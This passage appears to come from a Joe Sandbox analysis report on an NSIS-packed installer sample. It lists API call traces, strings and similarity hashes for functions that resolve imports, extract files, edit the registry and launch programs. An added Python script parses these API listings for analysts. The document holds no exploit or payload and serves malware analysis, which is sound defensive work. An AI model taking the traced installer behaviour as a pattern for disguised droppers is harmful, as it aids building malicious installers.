                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                              • API String ID: 2435955865-3712954417
                                              • Opcode ID: 7a316b5055b30f9aaac34ad57f3eca8da3b8ee04e2000637dca67fb3c636fbe9
                                              • Instruction ID: 24a773ffd11e725b17f64a587af86d00896606ebd673f2b671a94fa35e787169
                                              • Opcode Fuzzy Hash: 7a316b5055b30f9aaac34ad57f3eca8da3b8ee04e2000637dca67fb3c636fbe9
                                              • Instruction Fuzzy Hash: BBA1E670500701BBD6207F629D4AB1B7E9CEB01705F10483FF985B62D2DBBD9A458BAE
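Added example, not part of the Joe Sandbox report: the API lines in an entry like the one above follow a fixed shape (bullet, optional "Part of subcall function <addr>:", Api.MODULE(args), "ref:" call-site address), and the pivots an analyst wants from them are the non-hex arguments such as "~nsu.tmp", "\Temp" and "SeShutdownPrivilege". The script below parses that shape into records and pulls out the literal arguments. The sample lines are constructed from the 0x403415 entry; the record fields are my naming, not a Joe Sandbox export format.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function entry into records (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample in the shape of the report's listing (a subset of the 0x403415 entry).
SAMPLE = """\
• #17.COMCTL32 ref: 00403434
• SetErrorMode.KERNELBASE(00008001), ref: 0040343F
  • Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
• lstrcatW.KERNEL32(004E00C8,\\Temp), ref: 004035B1
• lstrcatW.KERNEL32(004E00C8,~nsu.tmp), ref: 00403685
• ExitProcess.KERNEL32 ref: 00403679
• ExitWindowsEx.USER32(00000002,00000000), ref: 004037C8
"""

# bullet, optional subcall prefix, Api.MODULE, optional (args), "ref: <8 hex digits>"
LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEXARG = re.compile(r"^-?[0-9A-Fa-f]{8}$")   # stack values the sandbox prints as 8 hex digits


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                  # call-site address
    subcall: Optional[int]    # callee address when the line is a "Part of subcall function" entry


def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn listing lines into ApiCall records; headings such as 'APIs' or 'Strings' are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls


def literal_args(calls: List[ApiCall]) -> Set[str]:
    """Arguments that are neither hex values nor the '?' placeholder: the strings worth pivoting on."""
    return {a for c in calls for a in c.args if a != "?" and not HEXARG.match(a)}


def calls_to(calls: List[ApiCall], api: str) -> List[ApiCall]:
    """All call sites of one API, in listing order."""
    return [c for c in calls if c.api == api]


if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    for c in parsed:
        where = f"  [in sub_{c.subcall:X}]" if c.subcall else ""
        print(f"{c.ref:08X} {c.module}!{c.api}({', '.join(c.args)}){where}")
    print("literal arguments:", sorted(literal_args(parsed)))
```

Running the script on a whole report's API sections (one entry per function) gives a quick list of embedded paths, registry keys and privilege names without reading every graph by hand.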

                                              Control-flow Graph

                                              Function at 0x405b98 (blocks 0x405b98-0x405bbc; rendered graph not reproduced): FindFirstFileW, then FindClose when a search handle was returned; a file-existence test whose result is the handle validity.
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,00464A20,0045FE18,00406093,0045FE18), ref: 00405BA3
                                              • FindClose.KERNEL32(00000000), ref: 00405BAF
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID: JF
                                              • API String ID: 2295610775-1378213080
                                              • Opcode ID: 8a2fef2aada0d280f7cfc8c7f2d825c9d5ff996b33c7372124f3e42565b734a1
                                              • Instruction ID: 1ee526d225bc4302f24aa9e13179370b3debcda52a21c952381bfba9845ea930
                                              • Opcode Fuzzy Hash: 8a2fef2aada0d280f7cfc8c7f2d825c9d5ff996b33c7372124f3e42565b734a1
                                              • Instruction Fuzzy Hash: 51D022301095206FC60003386D0C88B3A28EF0A3303104B32F1A5F22E0C7B4AC638A9C

                                              Control-flow Graph

                                              Function at 0x405bbf (blocks 0x405bbf-0x405bf3; rendered graph not reproduced): GetModuleHandleA, LoadLibraryA when the module is not already loaded, then GetProcAddress. This is the import resolver (sub_405bbf) the other functions call, so the APIs it fetches do not appear in the import table.
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
                                              • LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB
                                              Similarity
                                              • API ID: AddressHandleLibraryLoadModuleProc
                                              • String ID:
                                              • API String ID: 310444273-0
                                              • Opcode ID: 0ccf96f21d4775823ebfa39c65d9289fef824585f99c9f9fa051364898666991
                                              • Instruction ID: e5a37bd0471b14276c9a44c6b696aa1abbb9d0f0bd66a2a471ce49017894d203
                                              • Opcode Fuzzy Hash: 0ccf96f21d4775823ebfa39c65d9289fef824585f99c9f9fa051364898666991
                                              • Instruction Fuzzy Hash: 9DE08C32600A1297DA101B609E0896B777CAB89640302C43EF545B2011DB34B825ABAD

                                              Control-flow Graph

                                              Function at 0x4053f8 (blocks 0x4053f8-0x4056eb; rendered graph not reproduced): resolves imports via sub_405bbf, formats strings with wsprintfW (sub_4059ff) and lstrcatW; checks "%AtlasTreasures%" with lstrlenW, lstrcmpiW against ".exe" and GetFileAttributesW; LoadImageW, RegisterClassW, SystemParametersInfoW, CreateWindowExW; then ShowWindow, LoadLibraryW of RichEd20 and RichEd32, GetClassInfoW/RegisterClassW for the RichEdit class, and DialogBoxParamW with dialog procedure 0x404f45. Its string table also holds "Control Panel\Desktop\ResourceLocale" (used with HKCU, 0x80000001) and ".DEFAULT\Control Panel\International".
                                              APIs
                                                • Part of subcall function 00405BBF: GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
                                                • Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
                                                • Part of subcall function 00405BBF: GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB
                                              • lstrcatW.KERNEL32(004DC0C0,0044FD98), ref: 0040547C
                                              • lstrlenW.KERNEL32(%AtlasTreasures%,?,?,?,%AtlasTreasures%,00000000,004D00A8,004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000,00000006,004CC0A0), ref: 004054FF
                                              • lstrcmpiW.KERNEL32(?,.exe,%AtlasTreasures%,?,?,?,%AtlasTreasures%,00000000,004D00A8,004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000), ref: 00405512
                                              • GetFileAttributesW.KERNEL32(%AtlasTreasures%), ref: 0040551D
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D00A8), ref: 0040556F
                                                • Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C
                                              • RegisterClassW.USER32(00473240), ref: 004055BF
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004055D6
                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00405608
                                                • Part of subcall function 004039FC: SetWindowTextW.USER32(00000000,004732A0), ref: 00403A97
                                              • ShowWindow.USER32(00000005,00000000), ref: 0040563E
                                              • LoadLibraryW.KERNEL32(RichEd20), ref: 0040564F
                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 0040565A
                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00473240), ref: 00405669
                                              • GetClassInfoW.USER32(00000000,RichEdit,00473240), ref: 00405676
                                              • RegisterClassW.USER32(00473240), ref: 00405683
                                              • DialogBoxParamW.USER32(?,00000000,00404F45,00000000), ref: 004056A2
                                              Similarity
                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: %AtlasTreasures%$.DEFAULT\Control Panel\International$.exe$@2G$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                              • API String ID: 608394941-506693491
                                              • Opcode ID: c9e60b1b3c0f802fbfd7db3f6b9b6b56d484588749bd373d4ce2741afa478592
                                              • Instruction ID: 3004e29146ce1891a10f4484e48a0599eb6fbea5d6fbf796412b55f756561b6a
                                              • Opcode Fuzzy Hash: c9e60b1b3c0f802fbfd7db3f6b9b6b56d484588749bd373d4ce2741afa478592
                                              • Instruction Fuzzy Hash: 7F7104B0601A11BED710ABA5AD46F6F366CEB44304F40043BF949B62E2DB794D818FAD

                                              Control-flow Graph

                                              Function at 0x402ee7 (blocks 0x402ee7-0x403119; rendered graph not reproduced): a read loop over sub_402e9e and sub_402ed0 timed with GetTickCount, progress text built with MulDiv and wsprintfW ("... %d%%") and pushed through sub_404a73, a per-block call into sub_406b32, and WriteFile of the output at two sites (0x403067 and 0x4030ff).
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00402F59
                                              • GetTickCount.KERNEL32 ref: 00402FFA
                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403023
                                              • wsprintfW.USER32 ref: 00403036
                                              • WriteFile.KERNELBASE(00000000,00000000,00424D76,004032FA,00000000), ref: 00403067
                                              • WriteFile.KERNEL32(00000000,0041E170,?,00000000,00000000,0041E170,?,000000FF,00000004,00000000,00000000,00000000), ref: 004030FF
                                              Similarity
                                              • API ID: CountFileTickWrite$wsprintf
                                              • String ID: (=C$... %d%%$p!B$pA$pA$vB$vMB
                                              • API String ID: 651206458-1336809268
                                              • Opcode ID: 8c4c8dbab1ebe0afa4682773c2b87886d0ac197ebae181545411c68e098dc53f
                                              • Instruction ID: 169c75f2852f129af83c9b1986440f01f3d96746b5d1a97a5bed7113fa09ea58
                                              • Opcode Fuzzy Hash: 8c4c8dbab1ebe0afa4682773c2b87886d0ac197ebae181545411c68e098dc53f
                                              • Instruction Fuzzy Hash: 1C617B7190121AEBCF10CF65EA446AF7BB8AF44751F14413BE900B72D0D7B89A40DBA9

                                              Control-flow Graph

                                              Function at 0x40311b (blocks 0x40311b-0x40335e; rendered graph not reproduced): GetTickCount, GetModuleFileNameW and sub_4058fe (GetFileAttributesW, CreateFileW) to open the running executable, GetFileSize, then a chunked read loop (sub_402e9e) that compares DWORDs against "Inst", "soft" and "Null" at 0x403200, 0x403209 and 0x403212 and calls sub_4058ba per chunk; on a match GlobalAlloc, sub_402ed0 and sub_402ee7 process the data, followed by SetFilePointer. Failure paths reference "Error launching installer" (0x40316b) and "Installer integrity check has failed" (0x403359).
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040312C
                                              • GetModuleFileNameW.KERNEL32(00000000,004E80D8,00002004,?,?,?,00000000,004035D7,?), ref: 00403148
                                                • Part of subcall function 004058FE: GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
                                                • Part of subcall function 004058FE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924
                                              • GetFileSize.KERNEL32(00000000,00000000,004EC0E0,00000000,004D80B8,004D80B8,004E80D8,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00403194
                                              Strings
                                              • Null, xrefs: 00403212
                                              • soft, xrefs: 00403209
                                              • Error launching installer, xrefs: 0040316B
                                              • Inst, xrefs: 00403200
                                              • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 00403359
                                              Similarity
                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 4283519449-527102705
                                              • Opcode ID: 689548250178369e8610e5746f9adce2578bd5dbf9f68dd3f6bd973dda8ba485
                                              • Instruction ID: 9295a41ff54e91ce474836f10c0d971f7d59360bd190e5c91fe05c233bc104c6
                                              • Opcode Fuzzy Hash: 689548250178369e8610e5746f9adce2578bd5dbf9f68dd3f6bd973dda8ba485
                                              • Instruction Fuzzy Hash: 4D51D771900208ABDB119FA5DD85BAE7BA8EF04716F14417FE904B62D1DB7C8E808B9D

                                              Control-flow Graph

                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 00401917
                                              • CompareFileTime.KERNEL32(-00000014,?,%AtlasTreasures%,%AtlasTreasures%,00000000,00000000,%AtlasTreasures%,004D40B0,00000000,00000000), ref: 00401946
                                                • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                                                • Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00424D76,74DF23A0,00000000), ref: 00404AAB
                                                • Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00424D76,74DF23A0,00000000), ref: 00404ABB
                                                • Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
                                                • Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
                                                • Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
                                                • Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
                                                • Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: %AtlasTreasures%
                                              • API String ID: 1941528284-3870862676
                                              • Opcode ID: 4e2e2bfaca04459f9316266c88af64ec5a68e37a9f2f48202c4a4d3150a7de52
                                              • Instruction ID: b4e8f227fe7a9537edd0b9e90a91ba8e6819ca8d144e35aa4a9caf99775b3aa4
                                              • Opcode Fuzzy Hash: 4e2e2bfaca04459f9316266c88af64ec5a68e37a9f2f48202c4a4d3150a7de52
                                              • Instruction Fuzzy Hash: 6941C471A00614AADB10AB758C85EAF3668EF45329F20423BF416B11E2C77C4A91DFAD

                                              Control-flow Graph

                                              control_flow_graph 384 40172d-401741 call 40145c call 405807 389 401743-40175f call 4057b3 CreateDirectoryW 384->389 390 401786-40178a 384->390 397 401761-40176c GetLastError 389->397 398 40177c-401784 389->398 391 4017aa-4017b1 call 401435 390->391 392 40178c-4017a5 call 401435 call 405ab8 SetCurrentDirectoryW 390->392 406 402c58-402c67 391->406 392->406 401 401779 397->401 402 40176e-401777 GetFileAttributesW 397->402 398->389 398->390 401->398 402->398 402->401
                                              APIs
                                                • Part of subcall function 00405807: CharNextW.USER32(?,004CC0A0,0045FE18,?,00406059,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 00405815
                                                • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 0040581A
                                                • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 00405832
                                              • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000), ref: 00401757
                                              • GetLastError.KERNEL32 ref: 00401761
                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 0040176F
                                              • SetCurrentDirectoryW.KERNELBASE(00000000,004D40B0,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040179F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                              • String ID:
                                              • API String ID: 3751793516-0
                                              • Opcode ID: ec289c12e333ee4ac1693090613418d4a5d7498326967ec6e3adcff5c70bf25f
                                              • Instruction ID: e2322852a9c4e47e6d687db6679f044b16e0241981b9ece66bf6cd58216f8cce
                                              • Opcode Fuzzy Hash: ec289c12e333ee4ac1693090613418d4a5d7498326967ec6e3adcff5c70bf25f
                                              • Instruction Fuzzy Hash: 3F01D631904621DBE7206B755D45B6F32A8EF14365B21063BF992F22E2D73C4C81866D

                                              Control-flow Graph

                                              control_flow_graph 409 40592d-405939 410 40593a-40596e GetTickCount GetTempFileNameW 409->410 411 405970-405972 410->411 412 40597d-40597f 410->412 411->410 413 405974 411->413 414 405977-40597a 412->414 413->414
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040594B
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403392,004DC0C0,004E00C8), ref: 00405966
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: nsa
                                              • API String ID: 1716503409-2209301699
                                              • Opcode ID: 8f9989655f15aadf8d0cc60edb10422ff76ceb60520498c0bcc2ef1eb9998b51
                                              • Instruction ID: 0cdccb08d4a0cf0f0df5d656a0a7939b265b1f1c47613fc9c1e0506998bbacb4
                                              • Opcode Fuzzy Hash: 8f9989655f15aadf8d0cc60edb10422ff76ceb60520498c0bcc2ef1eb9998b51
                                              • Instruction Fuzzy Hash: C9F06276610608EBDB109F55DE05E9B7BA9EF94720F00803BE984A7190E6B099548B58

                                              Control-flow Graph

                                              control_flow_graph 423 40248e-402492 424 4024c0-4024cd call 40145c 423->424 425 402494-40249f call 40154d 423->425 430 4024db-4024e9 call 401497 424->430 431 4024cf-4024d5 424->431 432 401721-401728 425->432 433 4024a5-4024be call 40145c RegDeleteValueW RegCloseKey 425->433 440 4024eb-4024ed 430->440 431->430 434 402c58-402c67 432->434 433->440 440->434 442 4024f3 440->442 442->434
                                              APIs
                                                • Part of subcall function 0040154D: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,?,?), ref: 00401587
                                              • RegDeleteValueW.KERNELBASE(00000000,00000000), ref: 004024AF
                                              • RegCloseKey.ADVAPI32(00000000), ref: 004024B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CloseDeleteOpenValue
                                              • String ID:
                                              • API String ID: 849931509-0
                                              • Opcode ID: 28d58af51618036718c252708d6da1339e8b50d3138fddc83e0f4718e70968a2
                                              • Instruction ID: e1576bc29d89e2789c90d7360848647e5e88d3aa3db4fc6b5d334060f6266443
                                              • Opcode Fuzzy Hash: 28d58af51618036718c252708d6da1339e8b50d3138fddc83e0f4718e70968a2
                                              • Instruction Fuzzy Hash: FE01863250061197EB15EBA49A59B7F7274EB80758F21413FE402BB1E1C67C8D81865D

                                              Control-flow Graph

                                              control_flow_graph 443 40139b-4013a0 444 40140c-40140e 443->444 445 401410 444->445 446 4013a2-4013b2 444->446 447 401412-401413 445->447 446->445 448 4013b4-4013b5 call 40159c 446->448 450 4013ba-4013bf 448->450 451 4013c1-4013c9 call 40137c 450->451 452 401416-40141b 450->452 455 4013cb-4013cd 451->455 456 4013cf-4013d4 451->456 452->447 457 4013d6-4013db 455->457 456->457 457->444 458 4013dd-401406 MulDiv SendMessageW 457->458 458->444
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 7d139e0d7de234bcf6a700e513e47626535988416de2a1309b9d7b071a3250d9
                                              • Instruction ID: d821e5382ecf7e63f516690336e344d0ace40c90d4042eade43e4a0886427dd5
                                              • Opcode Fuzzy Hash: 7d139e0d7de234bcf6a700e513e47626535988416de2a1309b9d7b071a3250d9
                                              • Instruction Fuzzy Hash: 2801FF31A202209BEB155F35AC08B6B3698A784315F20427EF855F72F2D678CC829B8C

                                              Control-flow Graph

                                              control_flow_graph 459 4058fe-40592a GetFileAttributesW CreateFileW
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              • Opcode ID: 0a2f85832d22be582635bab1499ab015b7246acefa136c2a8fff2ea0c335f580
                                              • Instruction ID: 3557cad305de1e8d8744f7ed922a0974add56b4630c1d6058af0572804785a4b
                                              • Opcode Fuzzy Hash: 0a2f85832d22be582635bab1499ab015b7246acefa136c2a8fff2ea0c335f580
                                              • Instruction Fuzzy Hash: 0AD09E71654201EFEF099F20DE1AF6EBBA2EB84B01F11852CB692940E0DAB15819DB15

                                              Control-flow Graph

                                              control_flow_graph 460 4058de-4058eb GetFileAttributesW 461 4058fb 460->461 462 4058ed-4058f5 SetFileAttributesW 460->462 462->461
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00406701,?,?,?), ref: 004058E2
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 004058F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                              • Instruction ID: 9bfeacdea6eb5f2932ef974784812b51c4f8f2d5e5736dd59436ec15d4266534
                                              • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                              • Instruction Fuzzy Hash: 8DC01272404900AAC6001B34DF0881A7B22AB94331B258739B5BAE00F0CB3088A9AA18

                                              Control-flow Graph

                                              control_flow_graph 463 401f9b-401ff3 call 40145c * 4 call 401435 ShellExecuteW 474 402c58-402c67 463->474 475 401ff9 463->475 475->474
                                              APIs
                                              • ShellExecuteW.SHELL32(?,00000000,?,00000000,004D40B0,00000000), ref: 00401FEA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
